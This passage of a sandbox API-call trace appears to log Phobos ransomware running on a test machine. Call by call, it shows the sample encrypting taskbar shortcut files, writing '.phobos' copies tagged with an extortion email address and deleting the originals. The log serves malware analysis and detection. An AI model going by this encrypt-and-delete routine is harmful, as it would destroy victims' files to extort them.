lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0199.127] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.127] CloseHandle (hObject=0x15c) returned 1 [0199.127] CloseHandle (hObject=0x130) returned 1 [0199.127] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk")) returned 1 [0199.128] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.129] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1453) returned 1 [0199.129] CloseHandle (hObject=0x130) returned 1 [0199.129] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk")) returned 0x20 [0199.129] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.129] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.130] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.131] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.131] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.131] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5ad, lpOverlapped=0x0) returned 1 [0199.132] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0) returned 1 [0199.132] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5b0, lpOverlapped=0x0) returned 1 [0199.133] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.133] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.133] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0199.133] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.133] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0199.133] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.133] CloseHandle (hObject=0x130) returned 1 [0199.133] CloseHandle (hObject=0x15c) returned 1 [0199.133] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk")) returned 1 [0199.134] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.136] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1449) returned 1 [0199.136] CloseHandle (hObject=0x15c) returned 1 [0199.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk")) returned 0x20 [0199.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.136] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.136] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.137] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.137] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.137] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5a9, lpOverlapped=0x0) returned 1 [0199.215] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0) returned 1 [0199.215] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5b0, lpOverlapped=0x0) returned 1 [0199.216] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0199.216] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.216] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0199.216] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.216] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0199.216] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.216] CloseHandle (hObject=0x15c) returned 1 [0199.216] CloseHandle (hObject=0x130) returned 1 [0199.217] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk")) returned 1 [0199.218] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.218] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1169) returned 1 [0199.218] CloseHandle (hObject=0x130) returned 1 [0199.218] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk")) returned 0x20 [0199.219] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.219] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.219] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.226] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.226] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.226] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x491, lpOverlapped=0x0) returned 1 [0199.227] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4a0, dwBufLen=0x4a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4a0) returned 1 [0199.227] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4a0, lpOverlapped=0x0) returned 1 [0199.227] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0199.227] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.227] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0199.227] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.227] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0199.228] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.228] CloseHandle (hObject=0x130) returned 1 [0199.228] CloseHandle (hObject=0x15c) returned 1 [0199.228] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk")) returned 1 [0199.229] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.230] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1228) returned 1 [0199.230] CloseHandle (hObject=0x15c) returned 1 [0199.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk")) returned 0x20 [0199.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.230] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.230] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.231] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.231] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4cc, lpOverlapped=0x0) returned 1 [0199.232] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0, dwBufLen=0x4d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4d0) returned 1 [0199.232] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4d0, lpOverlapped=0x0) returned 1 [0199.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0199.233] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.233] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0199.233] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.233] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0199.233] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.233] CloseHandle (hObject=0x15c) returned 1 [0199.233] CloseHandle (hObject=0x130) returned 1 [0199.233] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk")) returned 1 [0199.234] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.235] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1228) returned 1 [0199.235] CloseHandle (hObject=0x130) returned 1 [0199.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk")) returned 0x20 [0199.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.236] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.236] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.237] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: 